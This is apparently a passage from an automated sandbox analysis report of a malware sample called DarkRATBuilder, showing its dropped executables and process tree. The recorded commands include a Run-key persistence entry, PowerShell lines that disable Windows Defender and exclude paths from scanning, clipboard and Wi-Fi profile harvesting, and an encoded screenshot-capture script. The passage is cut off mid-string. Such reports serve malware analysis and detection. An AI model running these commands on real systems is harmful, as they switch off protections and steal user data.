SeTakeOwnershipPrivilege 8264 WMIC.exe Token: SeLoadDriverPrivilege 8264 WMIC.exe Token: SeSystemProfilePrivilege 8264 WMIC.exe Token: SeSystemtimePrivilege 8264 WMIC.exe Token: SeProfSingleProcessPrivilege 8264 WMIC.exe Token: SeIncBasePriorityPrivilege 8264 WMIC.exe Token: SeCreatePagefilePrivilege 8264 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Update.exepid process 396 Update.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3436 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
DarkRATBuilder.exeDarkRATBuilder.execmd.exeBuild.exehacn.exehacn.execmd.exebased.exes.exebased.execmd.exesvchost.execmd.execmd.execmd.exesvchost.execmd.exedescription pid process target process PID 3532 wrote to memory of 3048 3532 DarkRATBuilder.exe DarkRATBuilder.exe PID 3532 wrote to memory of 3048 3532 DarkRATBuilder.exe DarkRATBuilder.exe PID 3048 wrote to memory of 960 3048 DarkRATBuilder.exe cmd.exe PID 3048 wrote to memory of 960 3048 DarkRATBuilder.exe cmd.exe PID 960 wrote to memory of 1164 960 cmd.exe Build.exe PID 960 wrote to memory of 1164 960 cmd.exe Build.exe PID 960 wrote to memory of 1164 960 cmd.exe Build.exe PID 1164 wrote to memory of 632 1164 Build.exe hacn.exe PID 1164 wrote to memory of 632 1164 Build.exe hacn.exe PID 632 wrote to memory of 3676 632 hacn.exe hacn.exe PID 632 wrote to memory of 3676 632 hacn.exe hacn.exe PID 3676 wrote to memory of 4880 3676 hacn.exe powershell.exe PID 3676 wrote to memory of 4880 3676 hacn.exe powershell.exe PID 4880 wrote to memory of 4904 4880 cmd.exe s.exe PID 4880 wrote to memory of 4904 4880 cmd.exe s.exe PID 4880 wrote to memory of 4904 4880 cmd.exe s.exe PID 1164 wrote to memory of 4672 1164 Build.exe based.exe PID 1164 wrote to memory of 4672 1164 Build.exe based.exe PID 4672 wrote to memory of 4972 4672 based.exe based.exe PID 4672 wrote to memory of 4972 4672 based.exe based.exe PID 4904 wrote to memory of 4628 4904 s.exe main.exe PID 4904 wrote to memory of 4628 4904 s.exe main.exe PID 4972 wrote to memory of 3428 4972 based.exe cmd.exe PID 4972 wrote to memory of 3428 4972 based.exe cmd.exe PID 4972 wrote to memory of 2484 4972 based.exe cmd.exe PID 4972 wrote to memory of 2484 4972 based.exe cmd.exe PID 4904 wrote to memory of 3832 4904 s.exe svchost.exe PID 4904 wrote to memory of 3832 4904 s.exe svchost.exe PID 4904 wrote to memory of 2004 4904 s.exe setup.exe PID 4904 wrote to memory of 2004 4904 s.exe setup.exe PID 4972 wrote to memory of 3460 4972 based.exe cmd.exe PID 4972 wrote to memory of 3460 4972 based.exe cmd.exe PID 4972 wrote to memory of 4816 4972 based.exe cmd.exe PID 4972 wrote to memory of 4816 4972 based.exe cmd.exe PID 4972 wrote to memory of 2164 4972 based.exe cmd.exe PID 4972 wrote to memory of 2164 4972 based.exe cmd.exe PID 3428 wrote to memory of 3496 3428 cmd.exe powershell.exe PID 3428 wrote to memory of 3496 3428 cmd.exe powershell.exe PID 3832 wrote to memory of 2192 3832 svchost.exe svchost.exe PID 3832 wrote to memory of 2192 3832 svchost.exe svchost.exe PID 4816 wrote to memory of 792 4816 cmd.exe tasklist.exe PID 4816 wrote to memory of 792 4816 cmd.exe tasklist.exe PID 2484 wrote to memory of 4880 2484 cmd.exe powershell.exe PID 2484 wrote to memory of 4880 2484 cmd.exe powershell.exe PID 3460 wrote to memory of 1248 3460 cmd.exe powershell.exe PID 3460 wrote to memory of 1248 3460 cmd.exe powershell.exe PID 2192 wrote to memory of 1296 2192 svchost.exe cmd.exe PID 2192 wrote to memory of 1296 2192 svchost.exe cmd.exe PID 4972 wrote to memory of 1840 4972 based.exe cmd.exe PID 4972 wrote to memory of 1840 4972 based.exe cmd.exe PID 4972 wrote to memory of 4964 4972 based.exe cmd.exe PID 4972 wrote to memory of 4964 4972 based.exe cmd.exe PID 4972 wrote to memory of 1660 4972 based.exe cmd.exe PID 4972 wrote to memory of 1660 4972 based.exe cmd.exe PID 2164 wrote to memory of 788 2164 cmd.exe tasklist.exe PID 2164 wrote to memory of 788 2164 cmd.exe tasklist.exe PID 4972 wrote to memory of 1860 4972 based.exe cmd.exe PID 4972 wrote to memory of 1860 4972 based.exe cmd.exe PID 4972 wrote to memory of 4948 4972 based.exe cmd.exe PID 4972 wrote to memory of 4948 4972 based.exe cmd.exe PID 4972 wrote to memory of 3396 4972 based.exe cmd.exe PID 4972 wrote to memory of 3396 4972 based.exe cmd.exe PID 4972 wrote to memory of 3964 4972 based.exe cmd.exe PID 4972 wrote to memory of 3964 4972 based.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:608
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1004
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1096
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1132
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:660
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3396
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1360
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1936
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1992
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2320
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2568
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2712
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3348
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\DarkRATBuilder.exe"C:\Users\Admin\AppData\Local\Temp\DarkRATBuilder.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Users\Admin\AppData\Local\Temp\DarkRATBuilder.exe"C:\Users\Admin\AppData\Local\Temp\DarkRATBuilder.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI35322\Build.exe -pbeznogym4⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Users\Admin\AppData\Local\Temp\_MEI35322\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI35322\Build.exe -pbeznogym5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:632 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI6322\s.exe -pbeznogym8⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Users\Admin\AppData\Local\Temp\_MEI6322\s.exeC:\Users\Admin\AppData\Local\Temp\_MEI6322\s.exe -pbeznogym9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\ProgramData\main.exe"C:\ProgramData\main.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4628 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp86E3.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp86E3.tmp.bat11⤵PID:7976
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4628"12⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:8040
-
-
C:\Windows\system32\find.exefind ":"12⤵PID:8048
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak12⤵
- Delays execution with timeout.exe
PID:8132
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f13⤵PID:5768
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f14⤵
- Adds Run key to start application
- Modifies registry key
PID:5856
-
-
-
-
-
-
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"10⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"12⤵PID:1296
-
-
-
-
C:\ProgramData\setup.exe"C:\ProgramData\setup.exe"10⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:2004
-
-
-
-
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"8⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"8⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"8⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"8⤵PID:1840
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName9⤵
- Suspicious use of AdjustPrivilegeToken
PID:6216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"8⤵PID:1660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"8⤵PID:4964
-
C:\Windows\system32\tasklist.exetasklist /FO LIST9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"8⤵PID:1860
-
C:\Windows\system32\tree.comtree /A /F9⤵PID:6312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"8⤵PID:4948
-
C:\Windows\system32\netsh.exenetsh wlan show profile9⤵PID:6320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"8⤵PID:3396
-
C:\Windows\system32\systeminfo.exesysteminfo9⤵
- Gathers system information
PID:6324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="8⤵PID:3964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgAC